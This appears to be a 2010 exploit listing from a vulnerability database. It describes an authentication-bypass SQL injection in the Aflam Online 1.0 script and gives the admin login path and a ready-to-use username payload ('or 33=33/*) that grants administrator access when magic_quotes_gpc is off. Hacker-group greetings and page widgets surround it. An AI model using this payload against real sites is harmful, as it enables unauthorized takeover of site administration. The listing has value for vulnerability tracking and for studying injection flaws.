Aflam Online 1.0 (Auth Bypass) SQL Injection

2010.02.06

Credit: alnjm33

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Exploit Title : Aflam Online (Auth Bypass) SQL Injection
Author: alnjm33
Software Link: http://www.hello-iraq.com/up/up/26420273720100122.rar
Tested on: Version 1.0
My home : Sec-war.com
need magic_quotes_gpc = Off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
(By : E3sar al3ra8 script aflam online )
================================Exploit=============================================
go to login page
http://SITE/path/admincp
exploit
put username = 'or 33=33/*
Password = Security War
=======================================================================================
Greetz to : First to The Best Team In Africa( Egypt Football TEAM ) PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aflam Online 1.0 (Auth Bypass) SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.